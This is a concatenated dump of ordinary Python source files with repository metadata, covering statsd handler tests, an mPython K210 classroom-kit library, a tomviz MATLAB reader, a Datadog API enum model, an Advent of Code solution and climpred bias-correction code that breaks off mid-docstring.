79553d1b156155b6ca4af72f7193f633478d5328 | 3,398 | py | Python | src/diamond/handler/test/teststatsdhandler.py | kevinrobinson/Diamond-1 | a15c4c178d9cc0c1c111652a8a6323206a9f31ac | [
"MIT"
] | 6 | 2015-04-13T21:24:24.000Z | 2020-05-11T07:43:05.000Z | src/diamond/handler/test/teststatsdhandler.py | kevinrobinson/Diamond-1 | a15c4c178d9cc0c1c111652a8a6323206a9f31ac | [
"MIT"
] | 3 | 2015-09-11T16:29:54.000Z | 2016-05-18T15:31:54.000Z | src/diamond/handler/test/teststatsdhandler.py | kevinrobinson/Diamond-1 | a15c4c178d9cc0c1c111652a8a6323206a9f31ac | [
"MIT"
] | 13 | 2015-01-11T12:10:45.000Z | 2021-01-27T10:55:02.000Z | #!/usr/bin/python
# coding=utf-8
################################################################################
from test import unittest
from test import run_only
from mock import patch
from mock import ANY
import configobj
from diamond.handler.stats_d import StatsdHandler
from diamond.metric import Metric
try:
import statsd
statsd # Pyflakes
except ImportError:
pass
def run_only_if_statsd_is_available(func):
try:
import statsd
statsd # workaround for pyflakes issue #13
except ImportError:
statsd = None
pred = lambda: statsd is not None
return run_only(func, pred)
class TestStatsdHandler(unittest.TestCase):
@run_only_if_statsd_is_available
@patch('statsd.Client')
def test_single_gauge(self, mock_client):
instance = mock_client.return_value
instance._send.return_value = 1
config = configobj.ConfigObj()
config['host'] = 'localhost'
config['port'] = '9999'
config['batch'] = 1
metric = Metric('servers.com.example.www.cpu.total.idle',
123, raw_value=123, timestamp=1234567,
host='will-be-ignored', metric_type='GAUGE')
expected_data = {
'servers.com.example.www.cpu.total.idle': '123|g'
}
handler = StatsdHandler(config)
handler.process(metric)
mock_client._send.assert_called_with(ANY, expected_data)
@run_only_if_statsd_is_available
@patch('statsd.Client')
def test_single_counter(self, mock_client):
instance = mock_client.return_value
instance._send.return_value = 1
config = configobj.ConfigObj()
config['host'] = 'localhost'
config['port'] = '9999'
config['batch'] = 1
metric = Metric('servers.com.example.www.cpu.total.idle',
5, raw_value=123, timestamp=1234567,
host='will-be-ignored', metric_type='COUNTER')
expected_data = {
'servers.com.example.www.cpu.total.idle': '123|c'
}
handler = StatsdHandler(config)
handler.process(metric)
mock_client._send.assert_called_with(ANY, expected_data)
@run_only_if_statsd_is_available
@patch('statsd.Client')
def test_multiple_counter(self, mock_client):
instance = mock_client.return_value
instance._send.return_value = 1
config = configobj.ConfigObj()
config['host'] = 'localhost'
config['port'] = '9999'
config['batch'] = 1
metric1 = Metric('servers.com.example.www.cpu.total.idle',
5, raw_value=123, timestamp=1234567,
host='will-be-ignored', metric_type='COUNTER')
metric2 = Metric('servers.com.example.www.cpu.total.idle',
7, raw_value=128, timestamp=1234567,
host='will-be-ignored', metric_type='COUNTER')
expected_data1 = {
'servers.com.example.www.cpu.total.idle': '123|c'
}
expected_data2 = {
'servers.com.example.www.cpu.total.idle': '5|c'
}
handler = StatsdHandler(config)
handler.process(metric1)
mock_client._send.assert_called_with(ANY, expected_data1)
handler.process(metric2)
mock_client._send.assert_called_with(ANY, expected_data2)
| 30.339286 | 80 | 0.607416 |
79553e12135f53622811ea41908d23e0393e6506 | 7,513 | py | Python | ports/esp32/modules/mpython_classroom_kit.py | ghsecuritylab/mPython-classroom-kit | c58c124b2268af328277183bd3d018c3aee744e1 | [
"MIT"
] | null | null | null | ports/esp32/modules/mpython_classroom_kit.py | ghsecuritylab/mPython-classroom-kit | c58c124b2268af328277183bd3d018c3aee744e1 | [
"MIT"
] | null | null | null | ports/esp32/modules/mpython_classroom_kit.py | ghsecuritylab/mPython-classroom-kit | c58c124b2268af328277183bd3d018c3aee744e1 | [
"MIT"
] | null | null | null | # labplus mPython-box library
# MIT license; Copyright (c) 2018 labplus
# mpython-box buildin periphers drivers
# history:
# V1.0 zhaohuijiang
from machine import Pin, ADC
import time, ujson
from mpython_classroom_kit_driver import K210,K210Error
from mpython import i2c
import ubinascii
# human infrared
pir = Pin(21, mode=Pin.IN, pull=None)
# slide POT
slider_res = ADC(Pin(34))
slider_res.atten(slider_res.ATTN_11DB)
k210 = K210()
def get_distance():
"""超声波,范围2~340cm"""
return k210.get_distance()
def get_key():
"""方向按键,返回按键列表"""
key_map = {0: 'left', 1: 'right', 2: 'up', 3: 'down', 4: 'ok'}
key_set = set()
_key = k210.get_key()
if _key:
for i in range(5):
if ((_key >> i) & 0x01):
key_set.add(key_map[i])
return key_set
def set_motor(speed):
"""马达,范围±100"""
if speed < -100 or speed > 100:
raise ValueError("Invalid value,Range in -100~100")
return k210.set_motor(speed)
def k210_reset():
k210.reset()
"""k210文件传送"""
def filefrom_k210(source,target=None):
k210.file_open(source,'rb')
if target ==None:
target = source
with open(target,'wb') as temp:
while True:
base_64_data= k210.file_read(512*3)
churk=ubinascii.a2b_base64(base_64_data)
if churk != b'':
temp.write(churk)
else:
break
k210.file_close()
def fileto_k210(source,target=None):
if target ==None:
target = source
k210.file_open(target,'wb')
with open(source,'rb') as temp:
while True:
buf = temp.read(512*3)
base64_data = ubinascii.b2a_base64(buf).strip()
if base64_data != b'':
k210.file_write(base64_data)
else:
break
k210.file_close()
class Model(object):
def __init__(self):
self.FACE_YOLO = 1
self.CLASS_20_YOLO = 2
self.MNIST_NET = 3
self.CLASS_1000_NET = 4
self.YOLO2 = 1
self.MOBILENET = 2
def select_model(self, builtin=None):
"""内置模型选择"""
k210.select_model(builtin)
def load_model(self, path, model_type, classes, anchor=None):
"""加载外部模型"""
k210.load_model(path=path, model_type=model_type,
classes=classes, anchor=anchor)
def detect_yolo(self):
"""yolo模型应用"""
return k210.detect_yolo()
def predict_net(self):
"""MobileNet模型预测"""
return k210.predict_net()
def deinit_yolo(self):
"""yolo释放"""
k210.deinit_yolo()
def deinit_net(self):
"""net释放"""
k210.deinit_net()
class LCD(object):
BLACK = 0
NAVY = 15
DARKGREEN = 992
DARKCYAN = 1007
MAROON = 30720
PURPLE = 30735
OLIVE = 31712
LIGHTGREY = 50712
DARKGREY = 31727
BLUE = 31
GREEN = 2016
RED = 63488
MAGENTA = 63519
YELLOW = 65504
WHITE = 65535
ORANGE = 64800
GREENYELLOW = 45029
PINK = 63519
def init(self, *args,**kws):
k210.lcd_init(*args,**kws)
def display(self,**kws):
k210.lcd_display(**kws)
def clear(self, color=0):
k210.lcd_clear(color=color)
def draw_string(self, *args):
k210.lcd_draw_string(*args)
class Camera(object):
RGB565 = 2
GRAYSCALE = 4
def reset(self):
k210.camera_reset()
def run(self,*arg):
k210.camera_run(*arg)
def snapshot(self):
k210.camera_snapshot()
def set_pixformat(self,*arg):
k210.camera_set_pixformat(*arg)
def set_contrast(self,*arg):
if arg[0] < -2 or arg[0] > 2:
raise ValueError("Invalid value,Range in -2~2")
k210.camera_set_contrast(*arg)
def set_brightness(self,*arg):
if arg[0] < -2 or arg[0] > 2:
raise ValueError("Invalid value,Range in -2~2")
k210.camera_set_brightness(*arg)
def set_saturation(self,*arg):
if arg[0] < -2 or arg[0] > 2:
raise ValueError("Invalid value,Range in -2~2")
k210.camera_set_saturation(*arg)
def set_auto_gain(self,*arg,**kw):
k210.camera_set_auto_gain(*arg,**kw)
def set_auto_whitebal(self,*arg):
k210.camera_set_auto_whitebal(*arg)
def set_windowing(self,*arg):
k210.camera_set_windowing(*arg)
def set_hmirror(self,*arg):
k210.camera_set_hmirror(*arg)
def set_vflip(self,*arg):
k210.camera_set_vflip(*arg)
def skip_frames(self,*arg,**kw):
k210.camera_skip_frames(*arg,**kw)
class Img(object):
def load(self, *args, **kws):
k210.image_load(*args, **kws)
def width(self):
return int(k210.image_width())
def hight(self):
return int(k210.image_hight())
def format(self):
return int(k210.image_format())
def size(self):
return int(k210.image_size())
def get_pixel(self, *args, **kws):
temp = k210.image_get_pixel(*args, **kws)
if temp:
return tuple(temp)
def set_pixel(self, *args, **kws):
k210.image_set_pixel(*args, **kws)
def mean_pool(self, *args, **kws):
k210.image_mean_pool(*args, **kws)
def to_grayscale(self):
k210.image_to_grayscale()
def to_rainbow(self):
k210.image_to_rainbow()
def copy(self,*args, **kws):
k210.image_copy(*args, **kws)
def save(self,*args, **kws):
k210.image_save(*args, **kws)
def clear(self):
k210.image_clear()
def draw_line(self,*args, **kws):
k210.image_draw_line(*args, **kws)
def draw_rectangle(self,*args, **kws):
k210.image_draw_rectangle(*args, **kws)
def draw_circle(self,*args, **kws):
k210.image_draw_circle(*args, **kws)
def draw_string(self,*args, **kws):
k210.image_draw_string(*args, **kws)
def draw_cross(self,*args, **kws):
k210.image_draw_cross(*args, **kws)
def draw_arrow(self,*args, **kws):
k210.image_draw_arrow(*args, **kws)
def binary(self,*args, **kws):
k210.image_binary(*args, **kws)
def invert(self):
k210.image_invert()
def erode(self,*args, **kws):
k210.image_erode(*args, **kws)
def dilate(self,*args, **kws):
k210.image_dilate(*args, **kws)
def negate(self,*args, **kws):
k210.image_negate(*args, **kws)
def mean(self,*args, **kws):
k210.image_mean(*args, **kws)
def mode(self,*args, **kws):
k210.image_mode(*args, **kws)
def median(self,*args, **kws):
k210.image_median(*args, **kws)
def midpoint(self,*args, **kws):
k210.image_midpoint(*args, **kws)
def cartoon(self,*args, **kws):
k210.image_cartoon(*args, **kws)
def conv3(self,*args, **kws):
k210.image_conv3(*args, **kws)
def gaussian(self,*args, **kws):
k210.image_gaussian(*args, **kws)
def bilateral(self,*args, **kws):
k210.image_bilateral(*args, **kws)
def linpolar(self,*args, **kws):
k210.image_linpolar(*args, **kws)
def logpolar(self,*args, **kws):
k210.image_logpolar(*args, **kws)
def rotation_corr(self,*args, **kws):
k210.image_rotation_corr(*args, **kws)
def find_blobs(self,*args, **kws):
return k210.image_find_blobs(*args, **kws)
def skip_frames(self,*arg,**kw):
k210.camera_skip_frames(*arg,**kw)
lcd = LCD()
camera = Camera()
model = Model()
image = Img()
| 23.625786 | 66 | 0.58858 |
79553ff4b657d4ece17177cd6939286154ee44ef | 1,632 | py | Python | tomviz/python/tomviz/io/formats/matlab.py | alesgenova/tomviz | 4d027585ad81f7a92e055fbf4658e63a8573c55d | [
"BSD-3-Clause"
] | null | null | null | tomviz/python/tomviz/io/formats/matlab.py | alesgenova/tomviz | 4d027585ad81f7a92e055fbf4658e63a8573c55d | [
"BSD-3-Clause"
] | null | null | null | tomviz/python/tomviz/io/formats/matlab.py | alesgenova/tomviz | 4d027585ad81f7a92e055fbf4658e63a8573c55d | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
###############################################################################
#
# This source file is part of the tomviz project.
#
# Copyright Kitware, Inc.
#
# This source code is released under the New BSD License, (the "License").
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###############################################################################
import numpy as np
import scipy.io
from tomviz.io import FileType, IOBase, Reader
import tomviz.utils
from vtk import vtkImageData
class MatlabBase(IOBase):
@staticmethod
def file_type():
return FileType('MATLAB binary format', ['mat'])
class MatlabReader(Reader, MatlabBase):
def read(self, path):
mat_dict = scipy.io.loadmat(path)
data = None
for item in mat_dict.values():
# Assume only one 3D array per file
if isinstance(item, np.ndarray):
if len(item.shape) == 3:
data = item
break
if data is None:
return vtkImageData()
image_data = vtkImageData()
(x, y, z) = data.shape
image_data.SetOrigin(0, 0, 0)
image_data.SetSpacing(1, 1, 1)
image_data.SetExtent(0, x - 1, 0, y - 1, 0, z - 1)
tomviz.utils.set_array(image_data, data)
return image_data
| 27.661017 | 79 | 0.572304 |
79554047150b909c50002b9ff262c7840896c01a | 7,010 | py | Python | src/datadog_api_client/v1/model/widget_text_align.py | MichaelTROEHLER/datadog-api-client-python | 12c46626622fb1277bb1e172753b342c671348bd | [
"Apache-2.0"
] | null | null | null | src/datadog_api_client/v1/model/widget_text_align.py | MichaelTROEHLER/datadog-api-client-python | 12c46626622fb1277bb1e172753b342c671348bd | [
"Apache-2.0"
] | null | null | null | src/datadog_api_client/v1/model/widget_text_align.py | MichaelTROEHLER/datadog-api-client-python | 12c46626622fb1277bb1e172753b342c671348bd | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
# Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.
# This product includes software developed at Datadog (https://www.datadoghq.com/).
# Copyright 2019-Present Datadog, Inc.
import re # noqa: F401
import sys # noqa: F401
import nulltype # noqa: F401
from datadog_api_client.v1.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
class WidgetTextAlign(ModelSimple):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
('value',): {
'CENTER': "center",
'LEFT': "left",
'RIGHT': "right",
},
}
validations = {
}
additional_properties_type = None
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
'value': (str,),
}
@cached_property
def discriminator():
return None
attribute_map = {}
_composed_schemas = None
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs):
"""WidgetTextAlign - a model defined in OpenAPI
Note that value can be passed either in args or in kwargs, but not in both.
Args:
args[0] (str): How to align the text on the widget.., must be one of ["center", "left", "right", ] # noqa: E501
Keyword Args:
value (str): How to align the text on the widget.., must be one of ["center", "left", "right", ] # noqa: E501
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
if 'value' in kwargs:
value = kwargs.pop('value')
elif args:
args = list(args)
value = args.pop(0)
else:
raise ApiTypeError(
"value is required, but not passed in args or kwargs and doesn't have default",
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.value = value
if kwargs:
raise ApiTypeError(
"Invalid named arguments=%s passed to %s. Remove those invalid named arguments." % (
kwargs,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
| 38.306011 | 124 | 0.571041 |
7955409ebbeb9aa3f1040f132a9694e59f1f239a | 501 | py | Python | 20.trench-map/py/part2.py | rolandbernard/adventofcode-2021 | 9249815af62d0fcf79b71357330a1456ea3be1ed | [
"BSD-2-Clause"
] | null | null | null | 20.trench-map/py/part2.py | rolandbernard/adventofcode-2021 | 9249815af62d0fcf79b71357330a1456ea3be1ed | [
"BSD-2-Clause"
] | null | null | null | 20.trench-map/py/part2.py | rolandbernard/adventofcode-2021 | 9249815af62d0fcf79b71357330a1456ea3be1ed | [
"BSD-2-Clause"
] | null | null | null |
import sys
import numpy as np
from scipy.ndimage import convolve
rawalgo, rawimg = sys.stdin.read().strip().split('\n\n')
algo = np.array([1 if c == '#' else 0 for c in rawalgo])
img = np.array([[1 if c == '#' else 0 for c in line] for line in rawimg.split('\n')])
bin = 2**np.arange(9).reshape(3, 3)
def enhance(img, algo):
img = np.pad(img, 1, 'edge')
return algo[convolve(img, bin)]
img = np.pad(img, 1)
for _ in range(50):
img = enhance(img, algo)
print("Result:", img.sum())
| 20.875 | 85 | 0.622754 |
79554166d18801777cfbef014f858ab86a0d6ff8 | 28,809 | py | Python | climpred/bias_removal.py | pangeo-data/climpred | 8df537f4a3740441dba55e018ce65e1b6d977162 | [
"MIT"
] | 104 | 2020-09-17T16:46:37.000Z | 2022-03-29T16:49:44.000Z | climpred/bias_removal.py | pangeo-data/climpred | 8df537f4a3740441dba55e018ce65e1b6d977162 | [
"MIT"
] | 303 | 2020-09-17T16:05:24.000Z | 2022-03-28T19:59:31.000Z | climpred/bias_removal.py | pangeo-data/climpred | 8df537f4a3740441dba55e018ce65e1b6d977162 | [
"MIT"
] | 18 | 2020-10-08T15:40:42.000Z | 2022-03-29T19:07:54.000Z | import logging
import warnings
import numpy as np
import pandas as pd
import xarray as xr
from bias_correction import XBiasCorrection
from xclim import sdba
from xskillscore.core.utils import suppress_warnings
from .constants import BIAS_CORRECTION_BIAS_CORRECTION_METHODS, GROUPBY_SEASONALITIES
from .metrics import Metric
from .options import OPTIONS
from .utils import (
convert_cftime_to_datetime_coords,
convert_time_index,
get_lead_cftime_shift_args,
shift_cftime_singular,
)
def sub(a, b):
return a - b
def div(a, b):
return a / b
def leave_one_out(bias, dim):
"""Leave-one-out creating a new dimension 'sample' and fill with np.NaN.
See also: https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.LeaveOneOut.html"""
bias_nan = []
for i in range(bias[dim].size):
bias_nan.append(
bias.drop_isel({dim: i}).reindex({dim: bias[dim]}).rename({dim: "sample"})
)
bias_nan = xr.concat(bias_nan, dim).assign_coords({dim: bias[dim]})
return bias_nan
def leave_one_out_drop(bias, dim):
"""Leave-one-out creating a new dimension 'sample'.
See also: https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.LeaveOneOut.html."""
bias_nan = []
for i in range(bias[dim].size):
bias_nan.append(bias.drop_isel({dim: i}).rename({dim: "sample"}).drop("sample"))
bias_nan = xr.concat(bias_nan, dim).assign_coords(
{dim: bias[dim], "sample": np.arange(bias[dim].size - 1)}
)
return bias_nan
def _mean_bias_removal_func(hind, bias, dim, how):
"""Quick removal of mean bias over all initializations without cross validation.
Args:
hind (xr.object): hindcast.
bias (xr.object): bias.
dim (str): Time dimension name in bias.
Returns:
xr.object: bias removed hind
"""
how_operator = sub if how == "additive" else div
seasonality = OPTIONS["seasonality"]
with xr.set_options(keep_attrs=True):
if seasonality == "weekofyear":
# convert to datetime for weekofyear operations
hind = convert_cftime_to_datetime_coords(hind, dim)
bias = convert_cftime_to_datetime_coords(bias, dim)
hind_groupby = f"{dim}.{seasonality}"
bias_removed_hind = how_operator(
hind.groupby(hind_groupby),
bias.groupby(hind_groupby).mean(),
)
bias_removed_hind.attrs = hind.attrs
# convert back to CFTimeIndex if needed
if isinstance(bias_removed_hind[dim].to_index(), pd.DatetimeIndex):
bias_removed_hind = convert_time_index(bias_removed_hind, dim, "hindcast")
return bias_removed_hind
def _multiplicative_std_correction(hind, spread, dim, obs=None):
"""Quick removal of std bias over all initializations without cross validation.
Args:
hind (xr.object): hindcast.
spread (xr.object): model spread.
dim (str): Time dimension name in bias.
obs (xr.object): observations
Returns:
xr.object: bias removed hind
"""
seasonality = OPTIONS["seasonality"]
if seasonality == "weekofyear":
# convert to datetime for weekofyear operations
hind = convert_cftime_to_datetime_coords(hind, "init")
spread = convert_cftime_to_datetime_coords(spread, "init")
obs = convert_cftime_to_datetime_coords(obs, "time")
init_groupby = f"init.{seasonality}"
obs_groupby = f"time.{seasonality}"
with xr.set_options(keep_attrs=True):
model_mean_spread = spread.groupby(init_groupby).mean()
model_member_mean = hind.mean("member").groupby(init_groupby).mean()
# assume that no trend here
obs_spread = obs.groupby(obs_groupby).std()
# z distr
init_z = (hind.groupby(init_groupby) - model_member_mean).groupby(
init_groupby
) / model_mean_spread
# scale with obs_spread and model mean
init_std_corrected = (init_z.groupby(init_groupby) * obs_spread).groupby(
init_groupby
) + model_member_mean
init_std_corrected.attrs = hind.attrs
# convert back to CFTimeIndex if needed
if isinstance(init_std_corrected.init.to_index(), pd.DatetimeIndex):
init_std_corrected = convert_time_index(init_std_corrected, "init", "hindcast")
return init_std_corrected
def _std_multiplicative_bias_removal_func_cv(hind, spread, dim, obs, cv="LOO"):
"""Remove std bias from all but the given initialization (cross-validation).
.. note::
This method follows Jolliffe 2011. For a given initialization, bias is computed
over all other initializations, excluding the one in question. This calculated
bias is removed from the given initialization, and then the process proceeds to
the following one.
Args:
hind (xr.object): hindcast.
bias (xr.object): bias.
dim (str): Time dimension name in bias.
how (str): additive or multiplicative bias.
Returns:
xr.object: bias removed hind
Reference:
* Jolliffe, Ian T., and David B. Stephenson. Forecast Verification: A
Practitioner’s Guide in Atmospheric Science. Chichester, UK: John Wiley &
Sons, Ltd, 2011. https://doi.org/10.1002/9781119960003., Chapter: 5.3.1, p.80
"""
seasonality = OPTIONS["seasonality"]
if seasonality == "weekofyear":
# convert to datetime for weekofyear operations
hind = convert_cftime_to_datetime_coords(hind, "init")
spread = convert_cftime_to_datetime_coords(spread, "init")
obs = convert_cftime_to_datetime_coords(obs, "time")
bias_removed_hind = []
for init in hind.init.data:
hind_drop_init = hind.drop_sel(init=init).init
with xr.set_options(keep_attrs=True):
init_groupby = f"init.{seasonality}"
time_groupby = f"time.{seasonality}"
model_mean_spread = (
spread.sel(init=hind_drop_init).groupby(init_groupby).mean()
)
model_member_mean = (
hind.drop_sel(init=init).mean("member").groupby(init_groupby).mean()
)
# assume that no trend here
obs_spread = obs.groupby(time_groupby).std()
# z distr
init_z = (
hind.sel(init=[init]).groupby(init_groupby) - model_member_mean
).groupby(init_groupby) / model_mean_spread
# scale with obs_spread and model mean
init_std_corrected = (init_z.groupby(init_groupby) * obs_spread).groupby(
init_groupby
) + model_member_mean
bias_removed_hind.append(init_std_corrected)
init_std_corrected = xr.concat(bias_removed_hind, "init")
init_std_corrected.attrs = hind.attrs
# convert back to CFTimeIndex if needed
if isinstance(init_std_corrected.init.to_index(), pd.DatetimeIndex):
init_std_corrected = convert_time_index(init_std_corrected, "init", "hindcast")
return init_std_corrected
def _mean_bias_removal_func_cv(hind, bias, dim, how, cv="LOO"):
"""Remove mean bias from all but the given initialization (cross-validation).
.. note::
This method follows Jolliffe 2011. For a given initialization, bias is computed
over all other initializations, excluding the one in question. This calculated
bias is removed from the given initialization, and then the process proceeds to
the following one.
Args:
hind (xr.object): hindcast.
bias (xr.object): bias.
dim (str): Time dimension name in bias.
how (str): additive or multiplicative bias.
Returns:
xr.object: bias removed hind
Reference:
* Jolliffe, Ian T., and David B. Stephenson. Forecast Verification: A
Practitioner’s Guide in Atmospheric Science. Chichester, UK: John Wiley &
Sons, Ltd, 2011. https://doi.org/10.1002/9781119960003., Chapter: 5.3.1, p.80
"""
how_operator = sub if how == "additive" else div
seasonality = OPTIONS["seasonality"]
bias = bias.rename({dim: "init"})
bias_removed_hind = []
logging.info(f"mean {how} bias removal with seasonality {seasonality}:")
if seasonality == "weekofyear":
# convert to datetime for weekofyear operations
hind = convert_cftime_to_datetime_coords(hind, "init")
bias = convert_cftime_to_datetime_coords(bias, "init")
if cv == "LOO":
for init in hind.init.data:
hind_drop_init = hind.drop_sel(init=init).init
with xr.set_options(keep_attrs=True):
init_groupby = f"init.{seasonality}"
init_bias_removed = how_operator(
hind.sel(init=[init]).groupby(init_groupby),
bias.sel(
init=hind_drop_init.to_index().intersection(
bias.init.to_index()
)
)
.groupby(init_groupby)
.mean(),
)
if seasonality in init_bias_removed.coords:
del init_bias_removed.coords[seasonality]
bias_removed_hind.append(init_bias_removed)
bias_removed_hind = xr.concat(bias_removed_hind, "init")
else:
raise NotImplementedError(f'try cv="LOO", found {cv}')
bias_removed_hind.attrs = hind.attrs
# convert back to CFTimeIndex if needed
if isinstance(bias_removed_hind.init.to_index(), pd.DatetimeIndex):
bias_removed_hind = convert_time_index(bias_removed_hind, "init", "hindcast")
return bias_removed_hind
def gaussian_bias_removal(
hindcast,
alignment,
cv=False,
how="additive_mean",
train_test_split="fair",
train_time=None,
train_init=None,
**metric_kwargs,
):
"""Calc bias based on OPTIONS['seasonality'] and remove bias from py:class:`~climpred.classes.HindcastEnsemble`.
Args:
hindcast (HindcastEnsemble): hindcast.
alignment (str): which inits or verification times should be aligned?
- maximize/None: maximize the degrees of freedom by slicing ``hind`` and
``verif`` to a common time frame at each lead.
- same_inits: slice to a common init frame prior to computing
metric. This philosophy follows the thought that each lead should be
based on the same set of initializations.
- same_verif: slice to a common/consistent verification time frame prior
to computing metric. This philosophy follows the thought that each lead
should be based on the same set of verification dates.
how (str): what kind of bias removal to perform. Select
from ['additive_mean', 'multiplicative_mean','multiplicative_std']. Defaults to 'additive_mean'.
cv (bool or str): Defaults to True.
- True: Use cross validation in bias removal function.
This excludes the given initialization from the bias calculation.
- 'LOO': see True
- False: include the given initialization in the calculation, which
is much faster and but yields similar skill with a large N of
initializations.
Returns:
HindcastEnsemble: bias removed hindcast.
"""
if train_test_split == "fair":
hindcast_train = hindcast.copy()
hindcast_test = hindcast.copy()
if alignment in ["same_inits", "maximize"]:
hindcast_train._datasets["initialized"] = hindcast.get_initialized().sel(
init=train_init
) # for bias
hindcast_test._datasets[
"initialized"
] = hindcast.get_initialized().drop_sel(
init=train_init
) # to reduce bias
if alignment in ["same_verif"]:
train_time = hindcast.coords["time"].sel(time=train_time).to_index()
# add inits before lead.max()
n, freq = get_lead_cftime_shift_args(
hindcast.coords["lead"].attrs["units"], hindcast.coords["lead"].max()
)
train_time_init = train_time.union(train_time.shift(-n, freq)).intersection(
hindcast.coords["init"].to_index()
)
hindcast_train._datasets["initialized"] = hindcast.get_initialized().sel(
init=train_time_init
)
hindcast_test._datasets[
"initialized"
] = hindcast.get_initialized().drop_sel(init=train_time_init)
else:
assert train_test_split in ["unfair", "unfair-cv"]
hindcast_train = hindcast
hindcast_test = hindcast
if "mean" in how:
# calculate bias lead-time dependent
bias = hindcast_train.verify(
metric="unconditional_bias" if how == "additive_mean" else "mul_bias",
comparison="e2o",
dim=[], # not used by bias func, therefore best to add [] here
alignment=alignment,
**metric_kwargs,
)
if how == "multiplicative_std":
bias = hindcast_train.verify(
metric="spread",
comparison="m2o",
dim="member",
alignment=alignment,
)
bias = bias.drop("skill")
# how to remove bias
if "mean" in how:
if cv in [False, None]:
bias_removal_func = _mean_bias_removal_func
bias_removal_func_kwargs = dict(how=how.split("_")[0])
else:
bias_removal_func = _mean_bias_removal_func_cv
bias_removal_func_kwargs = dict(how=how.split("_")[0], cv=cv)
elif how == "multiplicative_std":
if cv in [False, None]:
bias_removal_func = _multiplicative_std_correction
bias_removal_func_kwargs = dict(
obs=hindcast.get_observations(),
)
else:
bias_removal_func = _std_multiplicative_bias_removal_func_cv
bias_removal_func_kwargs = dict(obs=hindcast.get_observations(), cv=cv)
bias_removed_hind = bias_removal_func(
hindcast_test.get_initialized(), bias, "init", **bias_removal_func_kwargs
)
bias_removed_hind = bias_removed_hind.squeeze(drop=True)
# remove groupby label from coords
for c in GROUPBY_SEASONALITIES + ["skill"]:
if c in bias_removed_hind.coords and c not in bias_removed_hind.dims:
del bias_removed_hind.coords[c]
# replace raw with bias reducted initialized dataset
hindcast_bias_removed = hindcast.copy()
hindcast_bias_removed._datasets["initialized"] = bias_removed_hind
return hindcast_bias_removed
def bias_correction(
hindcast,
alignment,
cv=False,
how="normal_mapping",
train_test_split="fair",
train_time=None,
train_init=None,
**metric_kwargs,
):
"""Calc bias based on OPTIONS['seasonality'] and remove bias from py:class:`~climpred.classes.HindcastEnsemble`.
Args:
hindcast (HindcastEnsemble): hindcast.
alignment (str): which inits or verification times should be aligned?
- maximize/None: maximize the degrees of freedom by slicing ``hind`` and
``verif`` to a common time frame at each lead.
- same_inits: slice to a common init frame prior to computing
metric. This philosophy follows the thought that each lead should be
based on the same set of initializations.
- same_verif: slice to a common/consistent verification time frame prior
to computing metric. This philosophy follows the thought that each lead
should be based on the same set of verification dates.
how (str): what kind of bias removal to perform. Select
from ['additive_mean', 'multiplicative_mean','multiplicative_std']. Defaults to 'additive_mean'.
cv (bool): Use cross validation in bias removal function. This
excludes the given initialization from the bias calculation. With False,
include the given initialization in the calculation, which is much faster
but yields similar skill with a large N of initializations.
Defaults to True.
Returns:
HindcastEnsemble: bias removed hindcast.
"""
def bc_func(
forecast,
observations,
dim=None,
method=how,
cv=False,
**metric_kwargs,
):
"""Wrapping https://github.com/pankajkarman/bias_correction/blob/master/bias_correction.py.
Functions to perform bias correction of datasets to remove biases across datasets. Implemented methods include:
- quantile mapping: https://rmets.onlinelibrary.wiley.com/doi/pdf/10.1002/joc.2168)
